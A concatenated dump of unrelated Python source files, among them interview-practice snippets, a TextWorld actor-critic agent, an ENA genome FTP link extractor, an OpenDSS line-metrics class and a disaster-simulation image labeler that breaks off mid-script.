timedelta, datetime\n\n\nclass Interviewer:\n\n def __init__(self, work_start, work_end):\n self.work_start = work_start\n self.work_end = work_end\n self.booked_events = []\n\n def add_event(self, event):\n result = False\n if event.start >= self.work_start and event.end <= self.work_end:\n # O(n) -> O(log n)\n has_overlap = False\n for booked_event in self.booked_events:\n if booked_event.start <= event.start <= booked_event.end or \\\n booked_event.start <= event.end <= booked_event.end or \\\n (booked_event.start > event.start and booked_event.end < event.end):\n has_overlap = True\n break\n else:\n self.booked_events.append(event)\n return True\n\n return False\n\n\nclass Event:\n\n def __init__(self, start, duration: timedelta):\n self.start = start\n self.duration = duration\n self.end = start + duration\n\n\n##############################################\n# Round 2\n\n\n\n\n\n\ndef n_uniq_max(given_list, n):\n if n > len(given_list):\n return 0\n\n val_list = list(set(given_list))\n val_list.sort()\n\n result = sum(val_list[-n:])\n\n return result\n\n\ndef n_uniq_max_2(given_list, n):\n if n > len(given_list):\n return 0\n\n val_dic = {key: 0 for key in given_list}\n\n if n > len(val_dic.keys()):\n n = len(val_dic.keys())\n\n max_list = list(val_dic.keys())[:n]\n current_min = max_list[0]\n for val in max_list:\n if current_min > val:\n current_min = val\n\n for key in list(val_dic.keys())[n:]:\n if key > current_min:\n for i in range(len(max_list)):\n if max_list[i] == current_min:\n max_list[i] = key\n\n current_min = max_list[0]\n for val in max_list:\n if current_min > val:\n current_min = val\n\n result = 0\n for val in max_list:\n result += val\n\n return result\n\n\nimport time\n\ndef timeit(temed):\n\n def decorted(*args, **kargs):\n start_time = time.perf_counter()\n result = temed(*args, **kargs)\n print(f\"Execution_time = {time.perf_counter() - start_time} ms\")\n return result\n\n decorted.__name__ = temed.__name__\n return decorted\n\n\n@timeit\ndef fibonachi(n):\n if n < 2:\n return n\n\n result = 1\n prev = 0\n current = 1\n for i in range(2, n + 1):\n prev, current = current, prev + current\n result += current\n\n return result\n\n# print(fibonachi(100))\n\n\n# print(n_uniq_max_2( [1,2,3,7,23,99,1,2,4,1,15,6,4,99], 3))\n\n\nfrom datetime import date\n\n\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n # a class method to create a Person object by birth year.\n\n @classmethod\n def fromBirthYear(cls, name, year):\n return cls(name, date.today().year - year)\n\n # a static method to check if a Person is adult or not.\n\n @staticmethod\n def isAdult(age):\n return age > 18\n\n\nperson1 = Person('mayank', 21)\nperson2 = Person.fromBirthYear('mayank', 1996)\n\nprint(person1.age)\nprint(person2.age)\n\n# print the result\nprint(Person.isAdult(22))\n\n","sub_path":"Companies/Upstack.py","file_name":"Upstack.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343181431","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\n# Author: lixingtie\n# Email: lixingtie@barfoo.com.cn\n# Create Date: 2012-12-13\n\ndef url(handler, url):\n \"\"\"\n 生成URL\n \"\"\"\n if not handler.request.arguments:\n return url\n\n kvs = [ \"{0}={1}\".format(k, handler.get_argument(k)) for k, v in handler.request.arguments.items() ]\n\n if \"?\" in url:\n qs = url[url.index(\"?\") + 1:]\n url = url[:url.index(\"?\")]\n for kv in qs.split(\"&\"):\n kvs.append('%s=%s' % tuple(kv.split('=', 1)))\n\n return \"%s?%s\" % (url, \"&\".join(kvs))\n","sub_path":"framework/web/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"37919303","text":"from collections import defaultdict\nfrom os.path import join as pjoin\nfrom time import time\nfrom glob import glob\nfrom typing import Mapping, Any, Optional\nimport re\nimport numpy as np\nimport os\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom textworld import EnvInfos\nimport textworld.gym\nfrom gg_pretrained import ggModel\n\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cpu\")\n\nclass ActorzCritic(nn.Module):\n\n eps = 0.01\n\n def __init__(self, input_size, hidden_size):\n super(ActorzCritic, self).__init__()\n torch.manual_seed(42) # For reproducibility\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.encoder_gru = nn.GRU(hidden_size, hidden_size)\n self.cmd_encoder_gru = nn.GRU(hidden_size, hidden_size)\n self.state_gru = nn.GRU(hidden_size, hidden_size)\n\n self.linear_1 = nn.Linear(2 * hidden_size, 2 * hidden_size)\n self.critic = nn.Linear(hidden_size, 1)\n self.actor = nn.Linear(hidden_size * 2, 1)\n\n # Parameters\n self.state_hidden = torch.zeros(1, 1, hidden_size, device=device)\n self.hidden_size = hidden_size\n\n def forward(self, obs, commands, mode, method):\n input_length, batch_size = obs.size(0), obs.size(1)\n nb_cmds = commands.size(1)\n\n embedded = self.embedding(obs)\n encoder_output, encoder_hidden = self.encoder_gru(embedded)\n\n state_output, state_hidden = self.state_gru(encoder_hidden, self.state_hidden)\n self.state_hidden = state_hidden\n state_value = self.critic(state_output)\n\n # Attention network over the commands.\n cmds_embedding = self.embedding.forward(commands)\n _, cmds_encoding_last_states = self.cmd_encoder_gru.forward(cmds_embedding) # 1*cmds*hidden\n\n # Same observed state for all commands.\n cmd_selector_input = torch.stack([state_hidden] * nb_cmds, 2) # 1*batch*cmds*hidden\n\n # Same command choices for the whole batch.\n cmds_encoding_last_states = torch.stack([cmds_encoding_last_states] * batch_size, 1) # 1*batch*cmds*hidden\n\n # Concatenate the observed state and command encodings.\n input_ = torch.cat([cmd_selector_input, cmds_encoding_last_states], dim=-1)\n\n # One FC layer\n x = F.relu(self.linear_1(input_))\n\n # Compute state-action value (score) per command.\n action_state = F.relu(self.actor(x)).squeeze(-1) # 1 x Batch x cmds\n # action_state = F.relu(self.actor(input_)).squeeze(-1) # 1 x Batch x cmds\n\n probs = F.softmax(action_state, dim=2) # 1 x Batch x cmds\n\n if mode == \"train\":\n action_index = probs[0].multinomial(num_samples=1).unsqueeze(0) # 1 x batch x indx\n elif mode == \"test\":\n if method == 'random':\n action_index = probs[0].multinomial(num_samples=1).unsqueeze(0) # 1 x batch x indx\n elif method == 'arg-max':\n action_index = probs[0].max(1).indices.unsqueeze(-1).unsqueeze(-1) # 1 x batch x indx\n elif method == 'eps-soft':\n index = probs[0].max(1).indices.unsqueeze(-1).unsqueeze(-1)\n p = np.random.random()\n if p < (1 - self.eps + self.eps / nb_cmds):\n action_index = index\n else:\n while True:\n tp = np.random.choice(probs[0][0].detach().numpy())\n if (probs[0][0] == tp).nonzero().unsqueeze(-1) != index:\n action_index = (probs[0][0] == tp).nonzero().unsqueeze(-1)\n break\n\n return action_state, action_index, state_value\n\n def reset_hidden(self, batch_size):\n self.state_hidden = torch.zeros(1, batch_size, self.hidden_size, device=device)\n\nclass NeuralAgent:\n \"\"\" Simple Neural Agent for playing TextWorld games. \"\"\"\n\n MAX_VOCAB_SIZE = 1000\n UPDATE_FREQUENCY = 10\n LOG_FREQUENCY = 1000\n GAMMA = 0.9\n\n def __init__(self) -> None:\n self.id2word = [\"\", \"\"]\n self.word2id = {w: i for i, w in enumerate(self.id2word)}\n\n self.model = ActorzCritic(input_size=self.MAX_VOCAB_SIZE, hidden_size=128)\n self.optimizer = optim.Adam(self.model.parameters(), 0.00003)\n\n def train(self):\n self.mode = \"train\"\n self.method = \"random\"\n self.transitions = []\n self.last_score = 0\n self.no_train_step = 0\n self.stats = {\"max\": defaultdict(list), \"mean\": defaultdict(list)}\n self.memo = {\"max\": defaultdict(list), \"mean\": defaultdict(list), \"mem\": defaultdict(list)}\n self.model.reset_hidden(1)\n\n def test(self, method):\n self.mode = \"test\"\n self.method = method\n self.model.reset_hidden(1)\n\n @property\n def infos_to_request(self) -> EnvInfos:\n return EnvInfos(description=True, inventory=True, admissible_commands=True, won=True, lost=True)\n\n def act(self, obs: str, score: int, gg_score: float, nb_moves:int, done: bool, infos: Mapping[str, Any]) -> Optional[str]:\n # Build agent's observation: feedback + look + inventory.\n input_ = \"{}\\n{}\\n{}\".format(obs, infos[\"description\"], infos[\"inventory\"])\n\n # Tokenize and pad the input and the commands to chose from.\n input_tensor = self._process([input_])\n commands_tensor = self._process(infos[\"admissible_commands\"])\n\n # Get our next action and value prediction.\n outputs, indexes, values = self.model(input_tensor, commands_tensor, mode=self.mode, method=self.method)\n action = infos[\"admissible_commands\"][indexes[0]]\n\n if self.mode == \"test\":\n if done:\n self.model.reset_hidden(1)\n return action\n\n self.no_train_step += 1\n\n if self.transitions:\n reward = score - self.last_score # Reward is the gain/loss in score.\n self.last_score = score\n reward += gg_score\n reward = reward - (nb_moves *0.1)\n# print(\"reward: \", reward)\n if infos[\"won\"]:\n reward += 100\n if infos[\"lost\"]:\n reward -= 100\n\n self.transitions[-1][0] = reward # Update reward information.\n\n self.stats[\"max\"][\"score\"].append(score)\n self.memo[\"max\"][\"score\"].append(score)\n\n if self.no_train_step % self.UPDATE_FREQUENCY == 0:\n # Update model\n returns, advantages = self._discount_rewards(values)\n\n loss = 0\n for transition, ret, advantage in zip(self.transitions, returns, advantages):\n reward, indexes_, outputs_, values_ = transition\n\n advantage = advantage.detach() # Block gradients flow here.\n probs = F.softmax(outputs_, dim=2)\n log_probs = torch.log(probs)\n log_action_probs = log_probs.gather(2, indexes_)\n policy_loss = (log_action_probs * advantage).sum()\n value_loss = ((values_ - ret) ** 2.).sum()\n entropy = (-probs * log_probs).sum()\n loss += 0.5 * value_loss - policy_loss - 0.001 * entropy\n\n self.memo[\"mem\"][\"selected_action_index\"].append(indexes_.item())\n self.memo[\"mem\"][\"state_val_func\"].append(values_.item())\n self.memo[\"mem\"][\"advantage\"].append(advantage.item())\n self.memo[\"mem\"][\"return\"].append(ret.item())\n self.memo[\"mean\"][\"reward\"].append(reward)\n self.memo[\"mean\"][\"policy_loss\"].append(policy_loss.item())\n self.memo[\"mean\"][\"value_loss\"].append(value_loss.item())\n\n self.stats[\"mean\"][\"reward\"].append(reward)\n self.stats[\"mean\"][\"policy_loss\"].append(policy_loss.item())\n self.stats[\"mean\"][\"value_loss\"].append(value_loss.item())\n self.stats[\"mean\"][\"entropy\"].append(entropy.item())\n self.stats[\"mean\"][\"confidence\"].append(torch.exp(log_action_probs).item())\n\n if self.no_train_step % self.LOG_FREQUENCY == 0:\n msg = \"{}. \".format(self.no_train_step)\n msg += \" \".join(\"{}: {:.3f}\".format(k, np.mean(v)) for k, v in self.stats[\"mean\"].items())\n msg += \" \" + \" \".join(\"{}: {}\".format(k, np.max(v)) for k, v in self.stats[\"max\"].items())\n msg += \" vocab: {}\".format(len(self.id2word))\n print(msg)\n self.stats = {\"max\": defaultdict(list), \"mean\": defaultdict(list)}\n\n self.optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm(self.model.parameters(), 40)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n self.transitions = []\n self.model.reset_hidden(1)\n else:\n # Keep information about transitions for Truncated Backpropagation Through Time.\n self.transitions.append([None, indexes, outputs, values]) # Reward will be set on the next call\n\n if done:\n self.last_score = 0 # Will be starting a new episode. Reset the last score.\n\n return action\n\n def _process(self, texts):\n texts = list(map(self._tokenize, texts))\n max_len = max(len(l) for l in texts)\n padded = np.ones((len(texts), max_len)) * self.word2id[\"\"]\n\n for i, text in enumerate(texts):\n padded[i, :len(text)] = text\n\n padded_tensor = torch.from_numpy(padded).type(torch.long).to(device)\n padded_tensor = padded_tensor.permute(1, 0) # Batch x Seq => Seq x Batch\n return padded_tensor\n\n def _tokenize(self, text):\n # Simple tokenizer: strip out all non-alphabetic characters.\n text = re.sub(\"[^a-zA-Z0-9\\- ]\", \" \", text)\n word_ids = list(map(self._get_word_id, text.split()))\n return word_ids\n\n def _get_word_id(self, word):\n if word not in self.word2id:\n if len(self.word2id) >= self.MAX_VOCAB_SIZE:\n return self.word2id[\"\"]\n\n self.id2word.append(word)\n self.word2id[word] = len(self.word2id)\n\n return self.word2id[word]\n\n def _discount_rewards(self, last_values):\n returns, advantages = [], []\n R = last_values.data\n for t in reversed(range(len(self.transitions))):\n rewards, _, _, values = self.transitions[t]\n R = rewards + self.GAMMA * R\n adv = R - values\n returns.append(R)\n advantages.append(adv)\n\n return returns[::-1], advantages[::-1]\n\n\ndef play(agent, gg_premodel, path, max_step=50, nb_episodes=10, verbose=True):\n \"\"\"\n This code uses the cooking agent design in the spaceship game.\n\n :param agent: the obj of NeuralAgent, a sample object for the agent\n :param path: The path to the game (envo model)\n \"\"\"\n\n infos_to_request = agent.infos_to_request\n infos_to_request.max_score = True # Needed to normalize the scores.\n\n gamefiles = [path]\n if os.path.isdir(path):\n gamefiles = glob(os.path.join(path, \"*.ulx\"))\n\n env_id = textworld.gym.register_games(gamefiles,\n request_infos=infos_to_request,\n max_episode_steps=max_step)\n env = gym.make(env_id) # Create a Gym environment to play the text game.\n\n if verbose:\n if os.path.isdir(path):\n print(os.path.dirname(path), end=\"\")\n else:\n print(os.path.basename(path), end=\"\")\n\n # Collect some statistics: nb_steps, final reward.\n avg_moves, avg_scores, avg_norm_scores, seed_h = [], [], [], 4567\n for no_episode in range(nb_episodes):\n print(\"episode: \", no_episode)\n obs, infos = env.reset() # Start new episode.\n\n env.env.textworld_env._wrapped_env.seed(seed=seed_h)\n seed_h += 1\n\n score = 0\n gg_score = 0\n done = False\n nb_moves = 0\n while not done:\n command = agent.act(obs, score, gg_score, nb_moves, done, infos)\n print(\"command -> \", command)\n obs, score, done, infos = env.step(command)\n gg_result = gg_premodel.get_score(command)\n gg_score = gg_result[0][1] * 0.1\n# if gg_result[0][1] < 0:\n# gg_score = -0.25\n# else:\n# gg_score = 0.25\n nb_moves += 1\n agent.act(obs, score, gg_score, nb_moves, done, infos) # Let the agent know the game is done.\n\n if verbose:\n print(\".\", end=\"\")\n avg_moves.append(nb_moves)\n avg_scores.append(score)\n avg_norm_scores.append(score / infos[\"max_score\"])\n print(\"episode_score: \",score)\n\n env.close()\n msg = \" \\tavg. steps: {:5.1f}; avg. score: {:4.1f} / {}.\"\n if verbose:\n if os.path.isdir(path):\n print(msg.format(np.mean(avg_moves), np.mean(avg_norm_scores), 1))\n else:\n print(avg_scores)\n print(msg.format(np.mean(avg_moves), np.mean(avg_scores), infos[\"max_score\"]))\n\ngame_path = \"./tw_games/super_hero_1.ulx\"\nagent = NeuralAgent()\ngg_model = ggModel()\nstep_size = 750\n\nprint(\" ===== Training ===================================================== \")\nagent.train() # Tell the agent it should update its parameters.\nstart_time = time()\n# print(os.path.realpath(\"./games/levelMedium_v1.ulx\"))\nprint(os.path.realpath(game_path))\n# play(agent, \"./games/levelMedium_v1.ulx\", max_step=step_size, nb_episodes=2000, verbose=False)\nplay(agent, gg_model, game_path, max_step=step_size, nb_episodes=2000, verbose=False)\nprint(\"Trained in {:.2f} secs\".format(time() - start_time))\n\nprint(' ===== Test ========================================================= ')\nagent.test(method='random')\n# play(agent, \"./games/levelMedium_v1.ulx\", max_step=step_size) # Medium level game.\nplay(agent, gg_model, game_path, max_step=step_size) # Medium level game.\n\nsave_path = \"./model/levelMedium_v1_random.npy\"\nif not os.path.exists(os.path.dirname(save_path)):\n os.mkdir(os.path.dirname(save_path))\n\nnp.save(save_path, agent)","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164376711","text":"#This script will pull out each ftp address in the file\n#make a new file called [genome_id_ftp_download.txt]\n#that will eventually be fed into a wget -i script \n#so that I can download all of the genomes from ENA\n#Katie Brennan 2016-09-19\n\nimport os\nimport sys\nimport glob\nimport re\n\ninitial_dir = os.getcwd()\nftp_dir = initial_dir + '/he_cdif_ftp_directions'\n\nENA_dir = initial_dir + '/ENA_paths'\ni=0\n\n#r = re.compile(r\"\\b\\ftp.sra.ebi.ac.uk\\w*\\b\")\n#r = re.compile(r\"\\b\\w*ft\\w*\\b\")\n\nos.chdir(ENA_dir)\nfor file in glob.glob(\"*.txt\"):\n with open(file, 'r') as ENA_file:\n file_list = []\n for line in ENA_file:\n words = line.split() #words are now strings in a list\n for word in words:\n if \"ftp.sra.ebi.ac.uk\" in word:\n all_words = word.split(\";\")\n for wrd in all_words:\n file_list.append(wrd)\n file_list = set(file_list)\n genome = os.path.basename(file)\n genome_id = genome[:-4]\n genome_file = ftp_dir + '/'+genome_id+'_ftp_download.txt'\n with open(genome_file,'a') as gf:\n for item in file_list:\n gf.write('ftp://') \n gf.write(item)\n gf.write('\\n')\n \nprint(i)\n # genome_id = str(ENA_file)\n # genome_id = genome_id[:-4] #removing .txt from id name\n # genome_file = ftp_dir + '/' + genome_id + '/_ftp_download.txt'\n # with open(genome_file,'a') as genome:\n # for line in ENA_file:\n # if 'ftp' in line: \n # genome.write('ftp://'+line)\n\n \n","sub_path":"2016-cdiff/2016-09-19-He-genomes-download/cdif_rename_ENA_ftp.py","file_name":"cdif_rename_ENA_ftp.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31007326","text":"# Standard modules\nimport logging\nimport math\nimport os\nfrom datetime import datetime as dt\n\n# External modules\nimport opendssdirect\nimport pandas as pd\nimport pickle\n\n# Internal modules\nfrom dssmetrics.abstract_metrics import Metric\nfrom dssmetrics.constants import DATE_FORMAT\n\n\nclass LineMetric(Metric):\n\n \"\"\" Class to compute metrics related to line elements in distribution network\n Metrics implemeted:\n 1) LLRI - line loading risk index\n 2) LE - line efficiency\n \"\"\"\n\n def __init__(self,dss_instance,config_dict,logger=None):\n\n \"\"\" Constructor for LineMetric Class\"\"\"\n\n super().__init__(dss_instance,config_dict,logger)\n\n self.metriclist = [\"LLRI\",\"LE\"]\n self.initialize_result_containers(self.metriclist)\n\n # Few other variables for stroing lossed and powers\n self.active_losses,self.pre_act_losses = {}, {}\n self.active_power, self.pre_act_power = {}, {}\n\n self.lineloading = {'TimeStamps':[]}\n \n for element in self.dss_instance.Lines.AllNames():\n for metric in self.metriclist:\n self.metric[metric][element] = 0\n self.timeseries_metric[metric][element] = []\n self.lineloading[element] = []\n\n self.active_losses[element] = 0\n self.active_power[element] = 0\n self.pre_act_losses[element] = 0\n self.pre_act_power[element] = 0\n\n self.read_files()\n\n # Check if line loading needs to be exported or not\n if self.config_dict['export_lineloadings']:\n self.export_start_time = dt.strptime(self.config_dict['export_start_date'],DATE_FORMAT)\n self.export_end_time = dt.strptime(self.config_dict['export_end_date'],DATE_FORMAT)\n\n self.logger.info('LineMetric class initiallized')\n\n def exportAPI(self, exportpath: str = '.'):\n \n super().exportAPI(exportpath=exportpath)\n\n if self.config_dict['export_lineloadings']:\n line_dataframe = pd.DataFrame(self.lineloading)\n line_dataframe = line_dataframe.set_index('TimeStamps')\n line_dataframe.to_csv(os.path.join(exportpath,'lineloading.csv'))\n self.logger.info('Line loadings exported successfully')\n\n def read_files(self):\n\n \"\"\" Read pickle file containing information on customers present\n downward of a node.\n \"\"\"\n if 'line_cust_down.p' not in os.listdir(self.config_dict['extra_data_path']):\n raise Exception(\"'line_cust_down.p' does not exist!!\")\n\n with open(os.path.join(self.config_dict['extra_data_path'],'line_cust_down.p'),\"rb\") as picklefile:\n self.line_cust_down = pickle.load(picklefile)\n\n def get_losses(self):\n\n \"\"\" return total line losses : updates every time stamps\"\"\"\n return self.losses\n \n\n def update(self,dss_instance,current_time,timeseries_record,count):\n\n \"\"\" update method (must be present)\"\"\"\n\n super().update(dss_instance,current_time,timeseries_record)\n\n if self.config_dict['export_lineloadings']:\n if self.export_start_time <= current_time <= self.export_end_time:\n self.lineloading['TimeStamps'].append(current_time)\n\n # loop through all line elements\n self.dss_instance.Circuit.SetActiveClass('Line')\n flag = self.dss_instance.Lines.First()\n\n while flag>0:\n \n line_name = self.dss_instance.Lines.Name()\n linecomplexcurrent = self.dss_instance.CktElement.Currents()\n line_current_limit = self.dss_instance.CktElement.NormalAmps()\n linecurrent = [math.sqrt(i ** 2 + j ** 2) for i, j in \\\n zip(linecomplexcurrent[::2], linecomplexcurrent[1::2])]\n loading = max(linecurrent)/line_current_limit\n\n # Compute for efficiency\n self.active_losses[line_name] += self.dss_instance.CktElement.Losses()[0]\n\n # will store losses from all line elements\n self.losses += self.dss_instance.CktElement.Losses()[0]\n \n complex_power = self.dss_instance.CktElement.Powers()\n frombuspower, tobuspower = sum(complex_power[:int(.5*len(complex_power)):2]), \\\n sum(complex_power[int(.5*len(complex_power))::2])\n\n self.active_power[line_name] += max(abs(frombuspower),abs(tobuspower))\n\n efficiency = 100 - self.active_losses[line_name]/(10*self.active_power[line_name]) if \\\n self.active_power[line_name]>0.01 else 100\n \n self.metric['LE'][line_name] = efficiency\n \n # Compute for LLRI\n\n gamma = loading - 1 if loading>1 else 0\n #self.gamma[line_name] = gamma\n self.metric['LLRI'][line_name] += (len(self.line_cust_down[line_name]) \\\n /self.dss_instance.Loads.Count())*gamma \\\n *self.config_dict[\"simulation_time_step (minute)\"]*100/count\n \n # updates impacted customers list if violation occurs\n if gamma > 0:\n self.customers_impacted = list(set(self.customers_impacted).union(set(self.line_cust_down[line_name])))\n \n # updates gamma for customers (depth of violation)\n for load_name in self.line_cust_down[line_name]:\n if self.gamma[load_name] < gamma:\n self.gamma[load_name] = gamma\n \n # Export line loadings\n if self.config_dict['export_lineloadings']:\n if self.export_start_time <= current_time <= self.export_end_time:\n self.lineloading[line_name].append(loading)\n\n if timeseries_record:\n\n # update time-series line efficiency\n loss_daily = self.active_losses[line_name] - self.pre_act_losses[line_name]\n power_daily = self.active_power[line_name] - self.pre_act_power[line_name]\n efficiency_daily = 100 - loss_daily/(10*power_daily) if power_daily>0.01 else 100\n self.timeseries_metric['LE'][line_name].append(efficiency_daily)\n self.pre_act_losses[line_name] = self.active_losses[line_name]\n self.pre_act_power[line_name] = self.active_power[line_name]\n\n # update time-series LLRI\n previousvalue = self.metric['LLRI'][line_name] - sum(self.timeseries_metric['LLRI'][line_name])\n self.timeseries_metric['LLRI'][line_name].append(previousvalue)\n \n flag = self.dss_instance.Lines.Next()","sub_path":"EMeRGE/dssmetrics/line_metrics.py","file_name":"line_metrics.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"60950182","text":"\n\nfrom xai.brain.wordbase.verbs._sculpt import _SCULPT\n\n#calss header\nclass _SCULPTING(_SCULPT, ):\n\tdef __init__(self,): \n\t\t_SCULPT.__init__(self)\n\t\tself.name = \"SCULPTING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sculpt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_sculpting.py","file_name":"_sculpting.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"604668715","text":"# Tools for expressing evaluation metrics on testing. \nfrom typing import Tuple,List\n\ndef genConMatrix(real: Tuple[int], assigned: Tuple[int], K: int)-> List[List[int]]: ####CONVERT INTO LINEAR?\n\t# generates a KxK confusion matrix of counts with rows indexing real class values\n\t# and columns indexing assigned values. Returned as list for memory convenience\n\t# During iterative testing. \n\n\tmatrix = [[0 for n in range(K)] for m in range(K)]\n\n\tfor i in range(len(real)):\n\t\t# Iterates along measure sequences and adds count for \n\t\t# row designated in real sequence and column from assigned.\n\t\tmatrix[real[i]][assigned[i]] += 1\n\n\treturn matrix\n\ndef normConMatrix(matrix: List[List[int]])-> List[List[float]]:\n\t# Normalizes values in confusion matrix.\n\tnormMatrix = [[None for n in matrix[0]] for m in matrix]\n\n\ttotal = sum([sum(counts) for counts in matrix])\n\n\tfor i in range(len(matrix)):\n\t\tfor j in range(len(matrix[i])):\n\t\t\tnormMatrix[i][j] = matrix[i][j]/total\n\treturn normMatrix\n\ndef calcExpGain(conMatrix: List[List[float]], eGain: Tuple[Tuple[float]])-> float:\n\t# Calculates expected gain given a normalized confusion matrix conMatrix and \n\t# matrix of expected gain values eGain. Both must be of same size. \n\tK = len(conMatrix)\n\tvals = [conMatrix[real][assigned] * eGain[real][assigned] for real in range(K) for assigned in range(K)]\n\treturn sum(vals)\n\ndef main():\n#### units tests\n\n### Makes sure confusion matrix is valid for toy examples.\n\tresults = (1,2,2)\n\trealVal1 = (2,1,2)\n\trealVal2 = (1,2,2)\n\n\ttest1 = genConMatrix(realVal1, results, 3)\n\ttest2 = genConMatrix(realVal2, results, 3)\n\n\tideal1 = [[0,0,0],[0,0,1],[0,1,1]]\n\tideal2 = [[0,0,0],[0,1,0],[0,0,2]]\n\n\tassert test1 == ideal1\n\tassert test2 == ideal2\n\n### Tests for normConMatrix to be properly cumulative\n\tmatrix = [[3,4,3,2],[3,2,3,4],[0,3,2,3],[8,3,2,4]]\n\ttotal = sum([sum(counts) for counts in normConMatrix(matrix)])\n\tassert total > .9999999999999995 and total < 1.0000000000005\n\n### Tests for normConMatrix to generate probabilities as expected\n\tmatrix = [[4,3,1],[2,2,2],[3,2,1]]\n\tassert normConMatrix(matrix) == [[.2,.15,.05],[.1,.1,.1],[.15,.1,.05]],normConMatrix(matrix)\n\n### Tests for calcExpGain\n\tmatrix = [[.3,.3], [.04,.36]]\n\tegain = ((1,0),(0,2))\n\texpected = calcExpGain(matrix, egain)\n\tassert expected == 1.02, expected\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"beta/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"222486227","text":"from module.myModule import *\n\nmapName = \"\"\nGRID_COL = 0\nGRID_ROW = 0\n\nif not len(sys.argv) is 4:\n print(\"Usage : python Labeler_test.py [Map name][Grid row][Grid col]\")\n exit(1)\nelse:\n mapName = sys.argv[1]\n GRID_ROW = int(sys.argv[2])\n GRID_COL = int(sys.argv[3])\n\n# Label matrix\n# [ Number of civilians ]\nLABEL = [[0]*GRID_COL for i in range(GRID_ROW)]\n\n# Grid matrix\n# [ minX, maxX, minY, maxY ]\nGRID = [[[0, 0, 0, 0]]*GRID_COL for i in range(GRID_ROW)]\ngrid = \"%dx%d\" % (GRID_ROW, GRID_COL)\nif not os.path.exists(\"%s/%s/%s\" % (MODELS_DIR, mapName, grid)):\n os.makedirs(\"%s/%s/%s\" % (MODELS_DIR, mapName, grid))\n\n# Log\nnow = datetime.datetime.now().strftime(\"%d %H:%M:%S\")\nprint('[INFO][%s] Image label start' % now)\nprint('[INFO] Data sets root: %s/%s' % (LABEL_TEST_DATASET_DIR, mapName))\nprint('[INFO] Label %s #%d ~ #%d data sets' % (mapName, LABEL_TEST_START_MAP_NUM, LABEL_TEST_END_MAP_NUM))\n\n# Filtering and Labeling the images\n# Filtering : crop and resize\n# Labeling : depend on the time step limit and civilians HP\nHPListIndex = 0\nfor dataSetNum in range(LABEL_TEST_START_MAP_NUM, LABEL_TEST_END_MAP_NUM+1):\n dataSetPath = \"%s/raw/test/generated_image/%s/%s_%d\" % (LABEL_TEST_DATASET_DIR, mapName, mapName, dataSetNum)\n\n # Read information files for labeling\n mapInfoFile = open(\"%s/Parse/mapInfo.txt\" % dataSetPath, 'r')\n civilianLocFile = open(\"%s/Parse/civilianLoc.txt\" % dataSetPath, 'r')\n civilianHPFile = open(\"%s/Parse/civilianHP.txt\" % dataSetPath, 'r')\n\n # Create or Copy the Label directory\n if os.path.exists(\"%s/Label/%s\" % (dataSetPath, grid)):\n shutil.rmtree(\"%s/Label/%s\" % (dataSetPath, grid))\n os.makedirs(\"%s/Label/%s\" % (dataSetPath, grid))\n\n # Set map's width and height\n initWidth = 0\n initHeight = 0\n endWidth = mapInfoFile.readline().strip('\\n')\n endHeight = mapInfoFile.readline().strip('\\n')\n\n # Assign grid cell's range\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n GRID[row][col] = [(col * (int(float(endWidth)) / GRID_COL)),\n ((col + 1) * (int(float(endWidth)) / GRID_COL)),\n ((GRID_ROW - (row + 1)) * (int(float(endHeight)) / GRID_ROW)),\n ((GRID_ROW - row) * (int(float(endHeight)) / GRID_ROW))]\n\n # Labeling the images\n imageListFile = open(\"%s/Label/%s/ImageList.txt\" % (dataSetPath, grid), \"w+\")\n while True:\n # Parsing the map data\n # Read time step\n line = civilianLocFile.readline().strip('\\n')\n if not line: break\n step = int(line)\n civilianHPFile.readline()\n # Read civilian locations and HP list\n HPList = civilianHPFile.readline().split(' ')\n locList = civilianLocFile.readline().split('>')\n for eachLoc in locList:\n eachLoc = eachLoc.strip(' ')\n eachLoc = eachLoc.strip('<')\n if eachLoc != '' and eachLoc != '\\n':\n eachLoc = eachLoc.split(', ')\n x = int(eachLoc[0])\n y = int(eachLoc[1])\n\n # Check civilian's coordinate within cell\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n if GRID[row][col][0] <= x <= GRID[row][col][1] and GRID[row][col][2] <= y <= GRID[row][col][3]:\n if int(HPList[HPListIndex]) <= LIMIT_CIVILIAN_HP:\n LABEL[row][col] = int(LABEL[row][col]) + 1\n HPListIndex = HPListIndex + 1\n\n # Copy converted image to data set's label directory\n # Longer than LIMIT_TIME_STEP\n if step > LIMIT_TIME_STEP:\n label = []\n for row in range(0, GRID_ROW):\n for col in range(0, GRID_COL):\n label.append(int(LABEL[row][col]))\n image = \"%s/Image/%s_%d_Time_%d.png\" % (dataSetPath, mapName, dataSetNum, step)\n if os.path.isfile(\"%s\" % image):\n imageListFile.write(image)\n for eachLabel in label:\n imageListFile.write(\" \" + str(eachLabel))\n imageListFile.write(\"\\n\")\n else:\n 